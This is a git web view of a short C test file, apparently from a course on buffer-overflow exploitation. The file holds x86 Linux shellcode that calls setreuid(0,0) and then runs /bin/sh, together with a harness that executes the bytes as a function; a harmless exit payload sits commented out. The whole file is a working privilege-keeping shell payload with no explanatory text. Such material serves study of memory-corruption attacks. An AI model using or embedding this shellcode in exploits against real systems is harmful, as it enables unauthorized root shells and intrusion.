summaryrefslogtreecommitdiff
path: root/c_seguridad/code/bof/test.c
blob: c88c260ae983941f2b44d76df0894ce00e4f106a (plain) (blame)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
char shellcode[] =
"\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x31\xc0\x5b"
"\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d"
"\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73"
"\x68\x4e\x41\x41\x41\x41\x42\x42\x42\x42";

//char shellcode[] =
//"\x31\xc0\xb0\x01\x31\xdb\xb3\x7b\xcd\x80";


int main() {
	int (*func)();
	func = (int (*)()) shellcode;
	(*func)();
}